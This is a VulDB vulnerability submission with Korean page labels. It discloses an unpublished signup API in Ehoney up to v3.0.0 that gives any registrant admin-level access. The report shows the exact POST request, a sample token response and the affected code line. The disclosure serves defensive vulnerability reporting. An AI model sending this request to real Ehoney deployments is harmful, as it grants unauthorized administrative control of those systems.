| 제목 | Ehoney <= v3.0.0 unpublished signup api via /api/public/signup |
|---|
| 설명 | ## description
In Ehoney<=v3.0.0, there is an unpublished registered route. Any user can register an account through this api and log in. Since there is no permission division, this user has the same management permission as admin.
## request
POST /api/public/signup HTTP/1.1
Content-Length: 40
Content-Type: application/json
Host: x.x.x.x:8080
{
"username": "a",
"password": "a"
}
## response
{
"code": 200,
"msg": "ok",
"data": {
"name": "a",
"token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImEiLCJwYXNzd29yZCI6IiQyYSQxNCRINmVmQ0xLbFhRRnl3QXF6V0NGalB1bGhPLlU3MTlYRnhLZ1ZRN01OMTlUamhqZWo5bWcwVyIsImV4cCI6MTY2Njc3MjU4NiwiaXNzIjoiZ2luLWJsb2cifQ.GVpPi4PxprCAIiAMI7R_fko2g_9C-F9kVTFb_EbKWqo"
}
}
## affected code
https://github.com/seccome/Ehoney/blob/aba3197bd2fe9f16e9cf4e20c1a7df4a1608c5a7/controllers/user_handler/uesr.go#L51
|
|---|
| 사용자 | Anonymous User |
|---|
| 제출 | 2022. 10. 28. AM 03:54 (3 연령 ago) |
|---|
| 모더레이션 | 2022. 10. 28. AM 07:42 (4 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 212417 [seccome Ehoney /api/public/signup 권한 상승] |
|---|
| 포인트들 | 17 |
|---|